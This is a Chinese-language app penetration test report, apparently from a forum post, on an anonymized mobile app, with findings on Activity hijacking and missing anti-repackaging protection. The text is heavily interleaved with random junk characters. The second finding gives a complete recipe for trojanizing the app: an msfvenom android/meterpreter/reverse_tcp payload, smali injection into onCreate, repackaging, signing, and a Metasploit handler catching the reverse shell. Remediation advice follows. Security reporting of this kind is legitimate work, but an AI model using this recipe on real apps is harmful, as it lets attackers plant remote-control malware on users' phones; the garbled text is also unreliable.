' L: c& s, y' V, a7 U3 G9 V 1 y. b _" ^: F3 T @+ o. p# f
; L+ @8 v4 M/ k7 T: R7 G 5 [; |: v+ A8 P6 R" U' t

# Z8 P/ q8 {2 v9 e ' t* w: W) f5 u+ o0 Y8 ^& M   7 d! T, t: Y9 R* B5 e: t 0 N6 @8 p$ S$ d7 I/ `* K

u2 K% N2 _3 W3 {5 F : F5 a6 a+ a# H5 l C

6 J6 i5 D3 G8 r/ A; t% R: J+ L# l1 a5 u; H3 Y" |0 F 1-2 测试结果 / J& `2 R& u# p& H; S2 `8 T; l9 J8 m v' D0 U3 \; o

- j6 _8 `' _$ J, g: w- l & ^* [) f8 `2 Z2 r- M8 [( P

" p( [- i# s3 J4 p " _7 N9 c7 W+ Z# t- k   1 e+ D1 P8 z. Q* Z 3 d) l O; |9 ]" n

# `$ t' n4 C. K5 s* Y$ J# z . M5 ^" i' a9 O3 K0 o

, u; b$ @9 i8 C % J; v% \6 o- t5 z9 ]4 a 2 检测结果                    : r0 d! h' _9 w6 N) Z9 | / n( k& K: Z1 @1 l

. j3 e, }- F3 `) L0 ?4 g3 y : }5 |/ a" ?% c, |, t

- m9 F8 D3 @/ X& {8 _% I9 X $ r) W8 {+ Z5 \5 |7 ~ 2.1 某某某 # ?2 M, i" ^ @9 O + M O4 G. H& ]+ N9 Q; ^7 u

# Y$ H" O* h e& j$ o. |( X8 k* r `7 m6 a5 l! t$ _& _/ O

5 [5 A1 s9 f# d; g( s$ o8 Z1 G* W5 |) P: p% b* C/ b2 u/ l7 \' v) x 2.1.1检测目标 4 h. v- z. V2 o0 t3 t + C# _: {( S5 n) g, ]

; C W% v% f3 G2 X 6 u3 n+ p/ k7 T

# g$ j0 I v P) M4 k7 x) g3 A, U 目标地址: 某某某某某某APP 9 ~) X# K8 N& |8 H9 G1 B . [ r6 C- I) t. a3 Z

: {5 N; I" n9 W; }# X+ H" M1 P7 { * E8 V. R' z' X0 V, y2 Z

% w' v6 @% A) d: i9 @4 \ z! ^! I . P9 m, m& Y% V3 N# w: x' T 2.1.2检测结果 5 ?8 A& D; R' r7 ~6 { % z6 N! L1 e" N! [. X. d9 x

3 u3 }; R7 y) |, D) z) U2 X! u# ^+ Z. o/ m) \: T, S7 w2 m

4 u2 f: G5 e. ], \& u . O, z0 }, F5 ] y* \ 2.1.2.1 & |$ n+ [2 P, Z# h! N 8 z4 [( @2 o2 n ^% ~+ z s' Q

- ^: i, D* K& |, }7 I 2 H) Z- [' s3 u0 f* K

: Q D- ~, M' G, o 9 p/ ~! ~0 s8 X X) ~! D 漏洞链接地址:某某某某某某APP $ P5 ]8 N; j4 z7 K, }4 ?. H3 s2 y/ B2 d. k. ^2 i& |7 h

3 H3 n8 g) @* I! G! { 3 y F! {0 @& w/ T' {8 R

) h! K1 U0 I2 J& d G; [ 5 g" @! y8 p% I1 A; S- `' `' P   & C: z# k/ y8 z + X7 ?' |1 k& E) S c

9 V: M) P; Q! k+ V9 X$ K8 P# h i; n- o! w3 j" `0 O6 L6 v1 v0 X

2 Z3 M( i7 ~# [+ c$ g 9 f1 P6 J& T5 B8 s( b1 S 漏洞分析及取证: + K, G: K, V$ p, H$ E f " P& [+ }: w+ s/ `9 Y7 F

# R0 z' c% C5 D; b' ^6 ~5 F# b+ o; A

- o: d/ i# \% g& e% l) o 6 @1 ^9 c; k4 K3 | Y1 S                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: / ?# J3 |2 x% k" u + r5 p! ?+ s1 v

6 \9 o( i. A) U. H5 J$ s, p3 r 1 ]' b4 V$ S, U% w

, ~+ k& J0 F f$ d , Y& K) ^) ~6 p: m- F+ t      % U- u/ I6 k9 |* s- @4 c; G5 @( m% x& `& _+ Z3 Y; I1 {8 Z% |

% Z! @ n2 P4 ?7 {9 _% U ' r6 r4 B7 |. |7 c' T! F9 ]

3 L6 q% B: t9 C) [ - ]' l! N+ I6 X$ k& V' H                       & b/ o2 E+ c0 l9 P: F6 h5 O/ f2 l ( M+ D$ Q# P, O

. v' u$ J& R0 ^9 m+ D* b: ?6 R( ] % F7 y6 h' Z% ?, M5 e

3 ?, H6 ?) ^: [ 3 v% K% Z' ~. t4 t# R$ y + P: z" }0 b# S& ~( Q: ? 7 G! F: X) C' D

# Q% [1 |$ { ^2 F& T1 o7 `5 E2 V- d6 ^1 L( U8 |

' R9 }0 c: ^5 B8 J + E9 [+ ~* W$ W# Y0 D ( R, _) p) W t( j+ c; F2 k # x# S% e# I- g3 Y% {

& X- R# `& M3 J, o& B, C$ e9 O, ~1 x, ~5 i7 Q: R6 Z

% f6 c# p2 l$ T8 u. z) |0 Q. [ ; H- L @6 Q! \6 ~6 N$ A- T 2 s2 c$ K6 g5 W% i' I5 [' y7 r1 g/ H' q7 m6 n* ]* L! v) ]" ?: \

, r( g" e( [/ j0 n7 z 1 L% K; K( L6 c( k) X1 O

3 [- X' I+ v7 P4 V8 }9 |& W7 A4 Q3 W# R 漏洞危害:高 . C+ @% z" N; p4 p) V* _# ~4 O! o: @# v+ y) h

! |; W% U, b; A2 N' ? ) Q/ o6 i3 y# K. i. r! t2 K# O
0 U3 U, [' Q! \ h$ ^ 2 ^9 m! N Y V ?. W# ^: [2 | 9 P$ z5 ]" v6 P( ~/ r0 o. z3 H+ I4 T2 x4 t+ X/ E# i; ~. Q$ V# Y0 Q: ^, b5 E8 D6 [' p6 [; w( q$ K+ d1 C7 y! Y D, F6 T5 k- L7 D% J* Z) u( o! M+ p5 [/ J$ _0 @/ {4 v8 x& S( E, @& d/ B' g; @# ]# Z' }; Z: q+ v& j" E' m1 k! L7 d) Y" t* W3 s% O5 I Q$ R& j8 N. ~. P8 `) c S( o8 X( ^: O+ c# l* w0 t. h; Z p/ J* s/ A* f E. w. ]$ Q: Q% ^4 s5 `' u* `2 D; _0 G+ w, g' J: E. _1 J8 _, Y1 a/ h7 A. t( v- m6 a! {) d- I2 w. o _& Z/ ?2 N) G- `) j! t K/ O5 X& p* L' }1 M4 u/ X. c9 [0 ^6 A0 \" ^; X/ b$ e* ?& T+ L2 K% @! Y" c8 {9 n9 R/ _9 j' }2 p. y. B9 |) ]
1 U4 H) G6 m) [9 P1 j2 B: ^5 N v0 R

% f' {$ O( Q8 `5 V" a4 Z " }/ `& H' l* U% U$ @% Y: S 严重程度 - a4 |/ d6 a' H! l5 {6 U9 K9 x* ^* ~1 B( d7 c

- b; [+ [; I0 b6 o. l8 z. |# U* M9 d ' M7 m7 v l! p2 y% K- a 		) ~; o" ], H) m& e' d; { l; n9 Y! T/ D7 r- d& Y6 \ @. |

( |6 D: U* J6 \ ( n- [6 r: d2 r# c 7 O3 @; Z3 `. V6 a3 W; ~ 5 ]/ ?6 f8 u/ t- R" o5 q) @8 k

+ Z& g/ n; ?, `! C& m8 M & w3 ?0 T& I- h- e- R: t 		( _0 \6 E# E6 b & O0 |+ \" c4 ~' D/ L, y

' r; W2 X2 M; y! x2 j$ \" g) v# l' X# Q- K; F * D2 L/ y& g/ g u# ]% O8 R' ` . Z" Z5 {* N- I7 L D

6 `* b2 C" M8 ^8 j+ | ) i9 z8 \- d( g3 N" m+ _8 r& O 		$ P! Q7 W4 l* ]6 N: B" d' C1 H# u: v

6 x4 Y" R0 T5 d5 H) `- \8 L l' d- g! ~ ) f. o( L J3 o7 ^+ @% k t : m1 Y& k, u3 f

' V" i M% L4 p' G; C# n ! m, t) t4 c% o/ p 		, q' i/ ]6 h, o0 i! g+ M: K2 N. E( j8 i5 }* V* e: e# g8 ^

7 Q& C+ V! p' w- }" G. Y3 m% ?9 f; F9 t   ; c: M9 U9 D; N, K5 V$ G# N . f* g+ Q* U, k% Y& j

; J5 U7 u C& w; a. {7 P$ P 7 W! c$ O+ t: O3 s& a 		# b1 i* n0 L6 p6 H* Y & q( |& R/ q5 u

; n9 b' i/ O* F3 [- V ' d z( m' |8 h# M% a - m0 c4 d( b# z) g! z# X& X( @$ i' c. j7 T+ N( L6 v

9 t q! i' P3 q$ T, V3 P & Z& |% C. `5 E 		' h$ X/ ^& Q9 R! e8 z% E3 R ; V- C# G; O6 }+ ?8 R2 E

% c1 }# [: y" o 4 @% @0 Z T% U) Z   & Y# l. O% `; Y, L 5 \# O4 K8 D" L6 N

' d t* C" z6 L2 F% i/ S( S1 d8 N( p4 x2 q- ^9 Y6 ?- ~" n' c
. g Y0 R* n0 _& Z( { \- \5 G7 b$ \
$ ?/ C! m/ t' T; c 5 \$ _8 K8 X/ I. ~ `$ v

" f! K( C1 T! K2 j) Q9 o6 I / p# `; |* s _& B0 U5 a5 G+ a   $ h* s7 s: i0 L' T. w - {# }8 l5 T6 e3 o* {7 ?

; H% R# D/ M) w2 | + r' ]7 ]! @: V& t% c

3 h' f2 [# Q: t' n) d1 r ; n1 T9 x# F4 C2 p! T: U& B6 N 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 5 ^2 P8 b8 \3 W1 w' s, S; k . b. f# j4 Z0 Q+ b7 `% s' K: X$ g

+ d+ S2 L) K3 I9 A 3 y4 w$ }' ]. K7 q7 G

) a+ \' ~, h! n! W 7 M0 e3 Y9 i# [" d2 G. E           * a5 P4 w0 X, h; Y- P# e * s, e3 i3 U. w

* i* w4 ^1 l, b! Q; w" F. ^8 v! D4 E9 F$ n# A. Z1 v

, j/ R- L" N6 ` y) |7 U 8 m4 Q4 |& M. @- c   0 l! W& [/ k$ _8 [& n9 K 0 e A% V, a) m. |1 l- i* o5 U1 }

/ y5 P& c! P1 K2 |8 B3 m 6 T; K2 j* o1 o; _# L& e! E0 c

6 b7 r$ Y# N4 C# i. Y9 t6 ?1 v! o2 F; B 2.1.2.2 9 W9 R* X( U7 f* z' u8 h 6 z9 ?1 a; J' E1 Z

( I( N+ c% P& M* F$ i: ?2 ` L3 ?6 T / i& j) c: }8 E& z7 ?8 E

. a# v: b, H5 q r7 R. ` / W2 P- b& ?3 W9 }8 Q( v 漏洞链接地址:某某某某某某APP # k1 o- V: P( W' R! ?; ^: l - b" }2 a9 w3 V$ V3 g) M1 x

$ n% r# M! |+ k + c9 h. i3 }0 S0 K

/ @" R! r7 e( d$ X1 L+ p0 ^8 \5 h( y( E% i. M+ P/ J# k6 Z 漏洞分析及取证: 8 F5 C1 O/ P! |+ q- Y 0 t( i9 }% g0 ^; n1 b# |9 G4 Y o

/ \8 j( ]8 i' l( r. ]/ g9 Y / X- P8 \# ] e9 l3 ~

. a' x" P" V: v9 E4 a " z: q0 W1 K5 k, [7 q                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: @' f0 G6 a8 \! y9 o6 q2 E; D' K# M/ N- k% [4 I) _* A& x

6 H8 R* f9 x; B* X ( X" ^, ~- X8 v1 v! z

0 I6 F! J! v1 p7 [! \ ^ 4 ]% _& x( W0 a, i a0 r3 h Metasploit 生成木马 apk - F5 W0 W. n3 d7 d% H# [" n$ j8 H2 m / D8 r4 o/ M+ j3 o, @

. D6 F/ O6 [) `' ^# g5 F$ ~2 [$ l4 Q! c, J* @5 H( o

$ r1 i3 f. J5 A: U # B, c$ z) M; p/ w$ N8 E msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk * ?' w: Q. C8 Z + L' U1 ]$ J, c0 Z1 @ @

, i0 R8 w% z; H0 @) _- R% I 7 c; k1 c! I# n% d

! j3 F7 X1 N8 v* A% P1 P& A , ^1 U8 [3 O+ U3 a' g 反编译目标apk和木马apk 7 s% O$ Y0 n3 f ; m: E. R: u$ h- V$ c. p

! G$ B! f5 K7 z% r& g4 M 3 O1 B( V' l* t8 a% H3 Y' @ y

2 N9 s+ q8 q* s0 c! \: [5 X # Q: Y( C0 H9 o apktool d target.apk
$ @; O' o9 [- a7 \% l2 B ! }! r" p4 a! D1 N. L. P2 B2 A# {% K! O3 z apktool d cockhorse.apk & _0 [+ T1 d7 I5 ~) n8 p! g0 A! C) W8 K' W

! s1 f+ c/ t9 {; w9 d* L D0 \6 O# C6 `. ~, r3 s2 ~$ Q

# Z* p0 P0 m/ ] q$ V 9 V9 I9 e M0 b 木马 apk 注入目标 apk ; [1 A. W# T: G+ K8 r 4 L/ Y" d5 f( E

- |$ }! z1 `3 E" R , b- a, L3 D) |; `0 L) A' }

8 F. L2 P8 I5 n % S; m0 z* c# X+ n, X% m& @0 m! P 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
, Y( Y, M+ P& O9 R; {5 c 0 c7 L# e5 V' s( s7 @1 v. B. C invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 6 V4 B! @$ U% X4 f. W0 S: i" c# Y- K( w! [

! {# w9 }. E4 L0 _: J/ ]+ H3 a# Z8 X8 f. o$ _" N% r7 @7 z! x

6 ^9 t, @% T1 ^4 A 1 x. f0 [) b6 T& f3 G. u6 Y 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 1 W. u3 K7 r) W% W2 z7 A5 L7 k+ [4 ]$ X1 x. s9 h

0 e8 z4 B1 Y. ? X& }8 y ! D1 O$ A, r/ _- r0 p% a' v' h

2 l8 I% q4 Y& P" S, I8 n, s8 `$ Q 1 r2 H2 ]" w8 N 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ ' u) w8 R4 g- j+ {% ^ 0 F% G3 n2 `* ]7 P

5 n+ Z0 V! B b3 N0 S 6 K, {/ S s7 ^! n% t

' n# o9 V S; j2 [ 2 |4 r0 M& @4 \% ^* S 回编译生成最终 apk , o' C- a8 w1 Q' s 0 m+ m' Y/ i$ @$ p2 x

# ]) L) H6 d) Z$ x ' ^, ~9 R; l2 _9 L1 {6 z' o

' u% X* \ }3 F4 ~; p3 |; H( H : k( w' X) |' g" W2 L } 重新打包 2 s. _$ [ y# U, w ; H% a- t2 m4 X- {1 D

5 ~/ d2 G$ y* j & ^. N3 e+ W5 p, b( n

. ?3 c' Z8 E8 ?0 a1 g" F - w7 w4 K8 M m& G- n apktool b -o repackage.apk target_app_floder # W* c- K, f# Z% \5 Q. Z, s : W, r1 ?# ^( W9 V/ r1 J- d

1 G/ _% i: x5 B' }8 J6 [ 1 ~+ [+ o) @& A1 @4 M

7 w; f+ X$ h' d$ F+ Y( }/ ^- J/ w 8 _7 d5 f9 @5 ?% ^ 创建签名文件,有的话可忽略此步骤 + E% p' r5 a# E8 B 0 L# M: s4 c' k% j E9 c

2 _, X- t: \0 v# J' M ; i7 h0 L/ c( U) Q! \ I

2 j* h" `1 o2 L4 E0 `2 r" [$ r' S* h * i% m* W8 i6 k6 g$ `- v* N* Y keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                # d0 A7 l { d% t O4 t9 K3 W* a& I4 Z/ v

* j, \: h. m: n6 ?! E2 } 4 T" v+ h8 ?- z: i7 N

! a. w9 _9 C1 U. H* S 7 ^+ E" l7 y/ ]# d3 x0 I9 x D 签名,以下任选其一 6 X4 R( W4 |0 D6 ^: J6 D- f+ k' p& {; H

6 x( h. }- Y# ~3 _7 w5 z+ X + [9 d, f. h4 @' ?, @0 A/ a6 A

3 E% O6 D! D+ o0 z% Q; q9 S! o! w' ~ 9 T5 I' w+ A+ e7 \( a/ o jarsigner 方式 2 Z- H1 i" ` d1 b9 D 8 o- c8 n* [$ h; _. e9 G2 j

0 ~# N* I4 [% b q; f5 K 0 E6 l' s! M, Q$ V1 A7 B

, n9 ~" f, S8 Q4 R! K" U6 f$ X6 z4 ] 0 L" k6 ^* [- e2 d2 r: V* j# i jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname - C& P2 I" C( B! S" b3 R& y" r( f

- i/ D9 ?! d% P( x. m; ?! ?. ^' n( {! \' P: v

1 U2 T8 u: f W! M 0 ^4 {$ X* V# b- P apksigner 方式 4 W" Q3 L6 J! ^9 Q. @: Z * M6 r( [$ I C1 Z! D

) v( p' k n; t$ V$ j; Y- } 0 f5 p" r% s* C. _ [

' M9 T% B$ C1 D% h' `. [ + w* f; @- n1 l( ^ apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 2 E3 i- b5 ~- ? b8 l8 M4 Z# V 6 {9 W8 X4 p- ?, {' t) L* p

! U! t" N |1 X+ V- m & E) W. j1 h, r! \

9 ]: v3 u; R: H5 F$ R/ T5 s 7 B& A1 ~" D2 G% x w! h 如需要禁用 v2签名 添加选项--v2-signing-enabled false / E5 a+ v3 j) j( f% s 1 ?! n7 n3 T K0 } @' |

6 v. s3 D' T7 L# C 9 c' B. u5 l0 E4 t9 o( j$ H+ m

8 _6 E/ n! u4 r$ Q: E 7 [5 v8 H% D: G( @ 验证,以下任选其一 ) t; B6 z3 j# B 0 @$ X! D) D9 B) D: z) q3 s

8 }+ e: O8 }* O+ H5 u$ z- g9 Z 1 I" d, D6 Q, H6 l T. _

& X8 U p4 c& z0 p & {- d7 ~, N6 e) Y' _( Q jarsigner方式 8 N n1 @! L0 S' k6 x( k' ?; K, n9 C) t! M, i

3 ?) o5 B0 F' D- ~9 p- u# Y4 N5 X' H- a6 B3 o: g3 ?; k! T

\5 I1 I0 k# y9 G9 _7 ~) t& F7 h9 a! @4 i jarsigner -verify repackaged.apk , m7 E% U" }' g9 v * X9 o# l: D9 \# q

+ k2 v) f* P" \0 y) a ; k! C# T0 g/ {/ k2 U* x

/ h6 ]9 ?/ g7 a% Y 7 P% l) c3 T' T# ^# j9 k2 a. o apksigner 方式 $ i$ {+ s! R/ U , T I, P* o% F& V5 x8 N' m7 T/ d, l

: d$ ]. e9 B/ o) S2 R, _! t # Q* k0 r+ c/ r9 ?1 P

, l: Z" W6 n8 ^ 4 `8 ^& m8 T3 r. k/ R apksigner verify -v --print-certs repackaged.apk 2 J5 ^' X" z4 Q! [6 Z+ f j1 q: k6 g9 Q/ D+ q% i9 P

' n( n( e' {+ r: G/ E 9 l) q, c% o! E7 H

6 T' h' w0 k4 H2 `( N4 M6 d! @7 A/ }- @, l5 q3 o- ^+ k keytool方式 8 m' b4 |; A- \( h0 h, a, n5 M3 m6 t : L0 {! q/ E y' z, \

1 G! c3 T( U9 l' s/ k; m$ Q9 _* V7 Z1 v/ W) v/ e

3 L+ M; O* [8 l2 K$ q# R $ s: {: z+ {' l7 R& N keytool -printcert -jarfile repackaged.apk # Z; b, G# g" a+ u3 b0 } - z1 ?% s7 j2 Q

* m/ }/ W: N0 h $ N2 R% b9 w& O l) }

& ^; ~/ g# Y3 Q* v$ a; Y ]/ p: u* W0 V0 A& n 对齐 7 N/ A/ }! @( k+ G; ]: ~ Z( b9 E1 s' p: T3 u, U# ?8 e- L

7 S7 A+ l& z- e 6 s8 f, w" _. M( P5 f* T8 z

& L$ J0 j3 t3 |* e 1 {+ `1 b2 z# }& o6 |, X 字节对齐优化 , k- X# j1 X- \$ P/ H W: u$ [* m9 C8 ?& }) ]

& A' ^2 U2 q9 M0 T! l: p; K ' N3 p2 b6 q- p6 n

" v4 n% p- _6 }$ e: l 0 N! a" `+ Q$ O1 w. @ zipalign -v 4 repackaged.apk final.apk % W: _: `6 p* ~ [' B- L7 O2 k . H6 Q6 s; N& k" a3 j5 e

0 W4 G* k7 W/ I; ~+ a" I ( D( e! L7 `$ z

( h! P+ n1 Z' _4 H $ p! Z! U9 k1 D* ^5 z* Z 检查是否对齐 4 K$ o) m) Y5 |3 \$ r8 \ 5 `5 I+ L7 v. b+ H2 w, K" {

: X4 C$ F' o2 b- w) r ( S/ X5 c5 A" H l- ^" n& `& n

! T" ^0 V2 p* S1 B$ G) S' A# I" v7 ~$ B+ Q* D: }0 W4 h zipalign -c -v 4 final.apk ' m! h6 V( q' o } 7 l/ l4 R: Z& j9 Y

( P; e' V( t$ U/ \+ y+ u1 m . m( h0 j0 w3 H$ {) ?) { s

( o9 ^. g I3 j+ T3 C1 a" R, `: b : O5 i/ Y5 C; p( x6 m/ U$ W) y6 j9 S. g 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 n8 G9 I8 i2 ?3 u* j) w& U' l( D- H: c3 e! c* {! G4 g4 R

D- ~ A5 a5 h( J2 H% _. a7 m5 W* t* \/ M4 s$ I

. ]( u* }* B# t( x5 c6 u L / G+ l% W) e2 W5 {! T9 t9 ] 启动Metasploit控制台,配置参数等待上线 ; M9 b9 ^: e U% w; [' o- j" c - i' ?" G8 a9 f( i

2 D0 N2 R b) c + Q* w' e6 v% Q' b( r7 a

; X2 ^6 o9 A9 i. W1 V, O/ E9 X/ F 在终端依次输入如下命令 4 e) @; T* W" n* s, U9 X/ d7 l" j% a. q 9 s4 A8 y, z( S* y

, |' R2 G. `1 N6 a: w1 X ' X1 j5 W3 r# W- |1 a4 u* V% p- F

1 c0 z0 _- Z a; E, L* V ( h% \/ m: ]+ k. k msfconsole ; z7 ?; [- o0 i% X, t/ @- T; d! b" W- d" E' F# H

* u1 Y, u: u+ p; M5 o% \% M + m4 g! f5 g, v: q+ Z: {2 q

; U3 B0 o5 q6 K, W3 I+ O x; T: ] use exploit/multi/handler $ R9 o7 c+ c; Z* K, { 2 \0 e8 [8 V* v4 @$ I- t$ D" W

0 [0 P+ U/ w7 _7 ?) g 7 ~- Y9 E! U6 J# p O8 y' r0 o

: o7 I" F; W8 g% a; v; f ( Z0 K! F" ^# y8 O8 b set PAYLOAD android/meterpreter/reverse_tcp , P5 E6 p4 w( E# t! d; {/ G$ v; D! h( J* v# A& B' [8 ` a

3 T1 j0 W. H) V! ^2 F/ M8 A* {/ M. `) {$ p/ C8 d

/ I2 `& p8 R( X6 e % O' Z2 c z, z9 a7 k set LHOST 192.xxx.xx.xx # y- a0 B1 [' y& o z, V2 R- J6 L; W

) M. A& F! t1 L4 p* r. d7 m , |$ F( [' R8 ^( h7 m# f

7 ] d8 t6 F. r$ `) ?* B" P5 F9 m* E' M2 o set LPORT 4444 6 }1 ~! i) x/ w% M1 S' H* R& f " W3 z% U4 @' K9 W) R# d

# O' P( [: p$ Z/ }* [ 7 g; q" Z; K- I* t2 h5 I/ d

9 K- D4 Y0 Z, ? 0 p3 D4 S1 N1 y% F* G- a+ c exploit " @# B% y; ]& Z, @0 X- K( _ k 9 B/ h/ b; C+ B

7 _: W4 ~( P. P7 U; h % S5 [- _' p. l9 F

* Z* V: }3 J X. Y1 B2 D4 q 1 ^: y6 i# x* Q- z 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               8 b$ w+ g3 A* O/ `( [2 `# n2 T6 j

8 [4 x. s$ Z( W/ y4 F3 Q9 K ( M+ u3 J- ]6 ?, s+ D

u# ~) M4 ]& s0 { 7 s; d' V, x7 l* e* j9 C 漏洞危害:中 : w+ D2 a6 k3 ]4 S+ S# \) [: [- w+ v5 q% Q2 S

, A4 p* K( ?. T8 d/ s ; m1 [0 Z9 E0 q; y0 x) z
+ L' d( ?8 ^; f6 v. E7 y0 f+ M) D6 H ( d U3 I' W& T. L 6 |/ ] S3 ^ f% z8 }3 Z( N0 T( C 9 Z& E8 s: }8 [: v: F 4 c5 e7 h1 b0 q1 f) ~7 b4 i- b% h/ I3 i! h5 ?3 p; m4 a; ?% {4 f; z3 k9 p F0 Y0 S$ s7 C) B! [ w3 {) [! k7 c' P9 j; c3 w2 Q) Y& p5 `/ T5 o# [' r, v. Z0 p. m$ M7 c% ?) G7 A1 i& u* a) {4 s/ M3 J8 G( O7 ]0 W1 N2 V, t# }) c: S, g ]/ M% m! o3 t, m! c) v6 }+ X0 b, d3 N* T8 r5 n% `1 N1 T$ T) R- X E. ^' c1 A5 c( p+ v$ {2 @9 ?( J6 S& M% B5 v: ~3 b9 x! j* }" g$ v- G5 [3 a2 M8 Z* i- q) W# R, R @ T- X( Z% x4 f$ e# J3 g6 ^/ F5 w8 j+ d5 `# W: R! a$ D0 r2 E1 o2 ~% w9 ?3 x6 z; ~9 V. H. T# {! G" J( |7 R0 m, K# g) c1 I# J% r6 ?$ F& U3 R) O: A5 A9 M# _3 B- P) p& P% V+ R
3 Y; ]. B4 F# e% {0 M7 c% N) Z 2 r( V7 B5 x/ {: `

/ ~ `4 G$ u* B$ Q3 S( C 0 @6 g2 ?+ e* r( q7 A' G: F' T 严重程度 ; p5 ^8 w9 e& Z& b! _; J/ H3 e) A* n6 P7 ^: R# r$ k

/ _/ i! `) q# s B" I/ ^3 }5 W. X n0 q, U* `' {, H& ]8 e 		5 ^8 V4 ^4 i, U9 W . R, Y' X. `. E6 I. d r0 H

G# N0 l( ^3 H& p% o: Q' J - \( i* [! U. R # C$ i T4 U& I# f& | $ o2 ^% k8 t( a# z/ A c9 W

& w! M7 @3 o5 |7 y / h$ n# ^0 {7 @" W 		0 Z0 H7 z2 }8 d2 D& v& M- m3 ?: S( n - `2 L7 w) _7 x' Y

4 Q" ?4 k* O) I% ~0 A0 }# H0 D( i/ ?# B. [% J+ I, r 7 N# k5 b: s" r h ; M, C5 N q& D" O3 ~9 a6 J% G

( T' c$ V: ?4 j3 t2 y * W" r% a" M7 {& e, }* p8 Z3 | 		' H8 D( S. x1 V ! d% b& D6 J! z0 |& U R( U7 v& [

5 b. g( N! S3 a. G% x1 s6 _ ) I- u, g, s1 F# {! B. ]5 u" C ) H6 D* h2 I2 } & M; d& _$ t" O* T! o( E: \2 {

) Y$ s$ r f, L9 u( k % Y6 |2 }) Y) a1 `6 Q J; T* K 		9 \4 Q; Z7 d+ H, x4 Z8 R % e: H5 X$ Q+ ^8 }% a2 K / `" C1 r. i: t4 c $ z& j! S/ n2 V: C

/ w1 Z4 X; k# R! j 7 [- y$ A$ _$ k7 _- Z   2 S; _7 I6 u; J0 t4 f- f8 s ! V1 h6 _ t9 ^

$ s K8 z) }( ]; J' n 7 i8 \3 W7 d0 N 		7 s0 T2 H9 g/ |7 }9 M & e& U" y) o$ C

# j& r; ]7 X. [, {: \6 r- Q* I4 ?0 }# L$ V1 }- I. o# | " j- i/ c1 w4 p$ @2 m! I4 f ( h# s! Q' e3 X; V( n- I

- c. |* e$ P- { - G0 e# j' J. v5 k, ^) z% z! X 		2 D* e* I5 R7 m1 Q1 t# n# `# ?4 H1 c: m4 X8 Q+ @$ N ) M) M2 Z& Q% ~* m' Q [1 A5 x1 ^* Q4 w2 {" B' q" {2 L. I

: m7 u* U5 ]' U* V$ Z6 t9 A! Z' `+ \$ e7 O1 ~. w1 n% k   0 V9 o' |$ ^' Z# J* x + h) r C& K- M6 l; {- F5 ] p4 c3 k

& C" R. F1 Y |9 ~/ n 7 |3 b8 M, g( z+ i
, G% _4 v" `; b ! `+ }& t+ P1 w8 y4 V9 \; X
' y" r, b. w" W( n$ M0 [: ^2 o 7 d u2 [1 A3 F `7 _

9 Y' O: k1 v8 m! o. E# k% \- y& c3 m # i) f, _$ }9 i) w3 X+ I   9 ~: ?" z% U3 P- ?7 d8 F , U; O% U- G! C9 {1 d6 f

$ t% j! r2 k1 A: [7 h7 z 3 F3 N5 M1 C" `( T# t9 E( {# R) A4 `

( Z3 q" c$ N) g _. b! @! c( @5 g) M0 P 修复方法: 1 Y) ^5 _! h0 E- L+ E5 S( x/ b+ ]! A5 t/ y9 _, \. D

; n9 n! I0 x- t0 q# Y 1 d, r% @+ L1 Z" M* r' r

! y- K4 j+ [- z. M4 O8 V- T5 K0 V5 \- o& w               1. APP 启动时应做签名校验防止二次打包。
8 k0 f- \& ~4 v9 I2 V9 p* N# Z& k4 A1 A1 ` 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 9 B& v- w6 _; b; ~6 G# a4 Z R% |+ y3 Z8 O& X

" m) w6 H6 N6 J" u 5 y) i- K9 D5 v7 l4 c$ A" V , O/ E' b( x* s6 U( ]: U& g/ d 4 u' U/ j4 I5 B$ k: j( X/ f. m9 m

# s/ \# i1 V! ]$ o! o : }6 y( ~4 d' B+ C6 a6 q ]   ! W' v+ H2 `( z# X5 K; z 5 E9 E) t$ G9 {( v1 Y3 i6 P

0 T7 B; q* M& G9 G7 V$ I + A) e' f1 O( X" c* n0 |) [- G3 g S5 S + F/ F" h& N! {, f) }- U1 _4 n+ u5 {/ J8 z

- @1 ~# E, T4 N! f8 M , `4 I9 J1 p% k
5 I* Y9 e& F9 i, ? 8 b, B% a! e& X

1 R9 c' }$ k0 I) K9 y. C # J! @! Z( v y4 m, b, {7 W
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表